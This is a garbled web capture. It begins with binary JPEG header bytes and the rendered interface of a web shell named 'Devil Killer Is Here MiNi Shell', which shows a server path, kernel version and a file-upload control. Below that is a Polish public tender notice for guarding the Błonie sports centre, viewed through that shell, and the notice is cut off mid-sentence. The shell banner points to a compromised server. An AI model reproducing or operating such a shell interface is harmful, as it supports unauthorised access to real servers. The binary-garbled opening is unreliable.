JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211124/0028257601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ Usługa ochrony fizycznej i technicznej obiektów i mienia budynku Centrum Sportu w Błoniu przy ul. Grodziskiej 1 oraz kompleksu boisk wraz z urządzeniami znajdujących się przy Al. Norwida w Błoniu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Sportu i Rekreacji w Błoniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366231546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Błonie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-870</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (22) 770-72-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">centrumsportu@blonie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cs-blonie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ Usługa ochrony fizycznej i technicznej obiektów i mienia budynku Centrum Sportu w Błoniu przy ul. Grodziskiej 1 oraz kompleksu boisk wraz z urządzeniami znajdujących się przy Al. Norwida w Błoniu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7574c5bf-4d1d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00282576</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00176425/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Usługa ochrony fizycznej i technicznej obiektów i mienia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.cs-blonie.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">a) składanie, zmiana oraz wycofanie<br/>ofert odbywa się przy użyciu środków komunikacji elektronicznej<br/>w rozumieniu ustawy Pzp, poprzez:<br/>- miniPortal dostępny pod adresem : https://miniportal.uzp.gov.pl/,<br/>- ePUAP dostępny pod adresem : https://epuap.gov.pl/wps/portal<br/>b) komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności:<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji, wezwań do złożenia,<br/>uzupełnienia, wyjaśnienia oświadczeń lub dokumentów, zadawanie pytań, jak i udzielanie odpowiedzi<br/>odbywa się tylko za pośrednictwem poczty elektronicznej Zamawiającego na adres e-mail:centrumsportu@blonie.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)<br/>składanie, zmiana oraz wycofanie ofert odbywa się przy użyciu środków komunikacji elektronicznej<br/>w rozumieniu ustawy Pzp, poprzez:<br/>- miniPortal dostępny pod adresem : https://miniportal.uzp.gov.pl/ ,<br/>- ePUAP dostępny pod adresem : https://epuap.gov.pl/wps/portal<br/>b) komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności:<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji, wezwań do złożenia,<br/>uzupełnienia, wyjaśnienia oświadczeń lub dokumentów, zadawanie pytań, jak i udzielanie odpowiedzi<br/>odbywa się tylko za pośrednictwem poczty elektronicznej Zamawiającego na adres e-mail:<br/>- centrumsportu@blonie.plWymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Instrukcji korzystania z miniPortalu zamieszczonej na stronie<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika<br/>Ogłoszenie nr 2021/BZP 00176762/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi<br/>urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na Platformie:Windows, Mac i Linux. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i<br/>oznaczania czasu odbioru danych:<br/>- specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/>- oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu<br/>ePUAP.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>Microsoft Internet Explorer od wersji 11.0, Mozilla FireFox od wersji 15, Google Chrome od wersji 20,<br/>Microsoft Edge<br/>ID (identyfikator) danego postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich<br/>postępowań na miniPortalu.Wykonawca zamierzający wziąć udział w przedmiotowym postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP (https://epuap.gov.pl/wps/portal)<br/>Wykonawca posiadający konto na ePUAP ma dostęp m.in. do formularza złożenia, zmiany, wycofania<br/>oferty.<br/>ofertę należy złożyć w oryginale w postaci elektronicznej, opatrzoną kwalifikowanym podpisem<br/>elektronicznym , podpisem zaufanym lub podpisem osobistym.<br/>- zaleca się stosowanie podpisu wewnętrznego, który polega na tym, że jest zapisany łącznie z<br/>podpisywanym dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i plik podpisu),<br/>- zaleca się sporządzenie oferty i załączników do ofert w formacie PDF i podpisanie podpisem<br/>kwalifikowanym w formacie PAdES,<br/>- w przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia<br/>odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.<br/>- zaleca się stosowanie znacznika czasu w podpisie kwalifikowanym,<br/>- wykonawca nie może szyfrować przekazywanych plików samodzielnie ( szyfrowanie odbywa się<br/>zgodnie<br/>z pkt 8.2 h) poprzez stronę https://mimniportal.uzp.gov.pl.oferta musi być podpisana kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do<br/>reprezentowania Wykonawcy, w tym wspólnie ubiegających się Wykonawców o udzielenie<br/>zamówienia. wszystkie pliki stanowiące ofertę należy skompresować do jednego pliku archiwum (zip).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanego formularza do: złożenia,<br/>zmiany, wycofania oferty lub wniosku wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych Wykonawców, osób<br/>reprezentujących Wykonawców, pełnomocników i innych osób wskazanych w ofercie lub załączonych<br/>do niej dokumentach oraz umowie i jej załącznikach jest Zamawiający – dalej administrator – adres<br/>siedziby: ul. Grodzka 1, 05-870 Błonie<br/>Z administratorem można się skontaktować poprzez adres e-mail: centrumsportu@blonie.pl lub pod<br/>adresem siedziby administratora.<br/>Administrator wyznaczył inspektora ochrony danych, z którym można się skontaktować: iodo@rt-net.pl<br/>2. W zakresie w jakim przy realizacji Umowy dochodzi do udostępnienia przez Wykonawcę danych<br/>osobowych osób bezpośrednio zaangażowanych w realizację umowy, Zamawiający:<br/>1) Z chwilą udostępnienia staje się administratorem danych w rozumieniu art. 4 ust.7<br/>ROZPORZĄDZENIA PARLAMENTU EUROPEJSKIEGO I RADY (UE) 2016/679 z dnia 27<br/>kwietnia2016 r. w sprawie ochrony osób fizycznych<br/>i w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE zwanego dalej RODO.<br/>2) Jest zobowiązany do spełnienia obowiązków jakie ciążą na administratorze danych, w<br/>szczególności w zakresie dopełnienia obowiązku informacyjnego zgodnego z art. 14 RODO.<br/>3) Oświadcza, że wykorzysta przekazane mu dane osobowe w sposób, w który nie przekroczy granic<br/>niezbędnych do wykonania umowy, w szczególności nie będzie dokonywał czynności, które mogą<br/>zostać ocenione jako naruszające dobra osobiste osób, których dane zostały przekazane.<br/>3. Zamawiający zobowiązuje się do poinformowania swoich pracowników<br/>i współpracowników biorących udział w realizacji umowy o tym, że ich dane osobowe zostały<br/>udostępnione Wykonawcy przez Zamawiającego w celu prawidłowej realizacji umowy, w tym w celach<br/>kontaktowych. Poinformowanie będzie realizowane w imieniu Wykonawcy w sposób zgodny z art. 14<br/>RODO.<br/>4. Na potrzeby zawarcia i wykonania niniejszej Umowy przez „Informacje poufne” rozumie się<br/>informacje obejmujące: dane osobowe personelu, klientów, kontrahentów, beneficjentów.<br/>5. Wykonawca zobowiązuje się do zachowania w tajemnicy wszelkich informacji określonych w ust. 3<br/>powyżej, których ujawnienie mogłoby narazić Zamawiającego na szkodę lub odpowiedzialność prawną,<br/>w tym na podstawie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych), o których Wykonawca lub jego personel, dowie się w związku lub<br/>przy okazji realizacji niniejszej Umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.03.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 373,000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa ochrony fizycznej i technicznej obiektów i mienia budynku Centrum Sportu w Błoniu oraz kompleksu boisk wraz z urządzeniami. Miejscem wykonania zamówienia będzie budynek Centrum Sportu i Rekreacji w Błoniu wraz z parkingiem mieszczący się w Błoniu przy ul. Grodziskiej 1 o łącznej powierzchni ok. 15 580 m2 oraz kompleks boisk wraz z urządzeniami znajdujący się przy Al. Norwida w Błoniu o łącznej powierzchni ok. 20 000 m2.<br/>Teren przy ul. Grodziskiej jest terenem nieogrodzonym. <br/>Teren przy Al. Norwida jest terenem ogrodzonym. <br/>Oba tereny są monitorowane. Do obowiązków wykonawcy należeć będzie:<br/><br/>1.	Patrolowanie całego terenu i obiektu poprzez obchód i system monitoringu <br/>(Zamawiający zapewnia monitor zbierający obraz z kamer usytuowanych na terenie obiektu),<br/>2.	Konwojowanie środków pieniężnych dla obiektu Centrum Sportu w Błoniu do wyznaczonego przez Zamawiającego banku na terenie Gminy Błonie,<br/>3.	Reagowanie na wszelkie nieprawidłowości zgodnie z obowiązującymi przepisami prawa pracy i regulaminami obiektu,<br/>4.	Niezwłoczne powiadomienie organów ścigania o czynach przestępczych zaistniałych na terenie obiektu i zabezpieczenie miejsca ich popełnienia do czasu przybycia organów ścigania wraz z powiadomieniem zarządzającego obiektem,<br/>5.	Ochrona przed włamaniem do obiektu,<br/>6.	Ochrona mienia w obiekcie przed kradzieżą, zniszczeniem, uszkodzeniem,<br/>7.	Wezwanie osób do opuszczenia obszaru lub obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obszaru lub obiektu, albo stwierdzenia zakłócenia porządku,<br/>8.	Interwencje wobec osób zakłócających porządek,<br/>9.	Nadzór nad parkingiem,<br/>10.	Natychmiastowe reagowanie w sytuacji zagrożenia pożarem, zalaniem, ewentualnie innych nieprzewidzianych zdarzeń losowych oraz niezwłoczne powiadomienie odpowiednich służb, pod rygorem odpowiedzialności Wykonawcy za skutki zdarzeń, jakie mogą wystąpić z powodu opóźnienia reakcji na zdarzenie,<br/>11.	Zapewnienie wykonania przez pracowników ochrony poleceń upoważnionych pracowników Zamawiającego, dotyczących zapewnienia bezpieczeństwa osób i ochrony mienia,<br/>12.	Prowadzenie księgi dyżurów, wpisywanie informacji o objęciu dyżuru oraz wszelkich zdarzeniach, zaistniałych nieprawidłowościach i usterkach,<br/>13.	Zabezpieczenie samochodowej grupy interwencyjnej, której zadaniem będzie <br/>w przypadku zgłoszenia zagrożenia lub potrzeby wsparcia dotarcie do chronionego obiektu w czasie nie dłuższym niż 15 minut.<br/>14.	Pracownicy zatrudnieni przez Wykonawcę zobowiązani są do przestrzegania regulaminów obowiązujących na terenie ochranianych obiektów oraz pozostałych przepisów dotyczących bhp i ppoż.<br/>15.	Ochrona bezpośrednia 24h na dobę 365 dni w roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch miejsc po przecinku zgodnie z zasadami matematycznymi, w kryterium jakościowym przyzna punkty 0 lub 40.<br/>Zamawiający wybierze ofertę najkorzystniejszą spośród nie odrzuconych ofert na podstawie kryterium ceny i kryterium jakościowego.<br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość usług – 40% - za posiadanie rekomendacji organizacji skupiającej pracodawców branży ochrony ( np. Polskiego Związku Pracodawców Ochrony, Polskiej Izby Ochrony ) lub równoważnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa <br/>w art. 112 ust.2 ustawy, którzy:<br/><br/>a) nie podlegają wykluczeniu ( na podstawie zapisów w pkt. 21 niniejszej SWZ, dotyczących podstaw wykluczenia )<br/><br/>b) spełniają następujące warunki udziału w postępowaniu w zakresie: <br/><br/>1) zdolności do występowania w obrocie gospodarczym,<br/>(Zamawiający nie precyzuje tego warunku);<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/><br/>Zamawiający wymaga aby wykonawca posiadał aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, pozwalającą na świadczenie usług ochroniarskich objętych przedmiotem zamówienia zgodnie z przepisami ustawy z dn.22 sierpnia 1997 r. o ochronie osób i mienia <br/>(Dz. U. z 2020 r. poz.838 t. j. 2020.05.12)<br/><br/>3) sytuacji ekonomicznej lub finansowej<br/><br/>Zamawiający wymaga - aby Wykonawca wykazał, że:<br/>posiada środki finansowe lub zdolność kredytową w kwocie min. 100.000,00 zł <br/><br/><br/>4) zdolności technicznej lub zawodowej<br/><br/>Zamawiający wymaga aby Wykonawca:<br/><br/>a. wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje - w okresie ostatnich 3 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie - co najmniej 3 zamówienia o wartości nie mniejszej niż 150 000 zł brutto każde, polegające na świadczeniu usług ochrony osób i mienia wraz z monitoringiem obiektów ze stałym patrolem interwencyjnym. <br/><br/><br/>b. skierował do realizacji zamówienia publicznego:<br/><br/>- min. 1 koordynatora usług ochroniarskich z min. 5 letnim doświadczeniem, posiadającego wpis na „listę kwalifikowanych pracowników ochrony fizycznej” w rozumieniu ustawy o ochronie fizycznej osób i mienia, spełniający wymogi zgodnie z art. 25, 26 i 27 (t. j. Dz. U. z 2018 r., poz. 2142), pełniący nadzór nad agentami ochrony fizycznej,<br/> <br/> - min. 3 kwalifikowanych pracowników ochrony z min. 3 letnim doświadczeniem, którzy będą pełnić ochronę na terenie Centrum Sportu w Błoniu, wpisanych na „listę kwalifikowanych pracowników ochrony fizycznej” prowadzoną zgodnie z ustawą o ochronie osób i mienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/><br/>*Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, <br/>zamiast dokumentów, o których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa 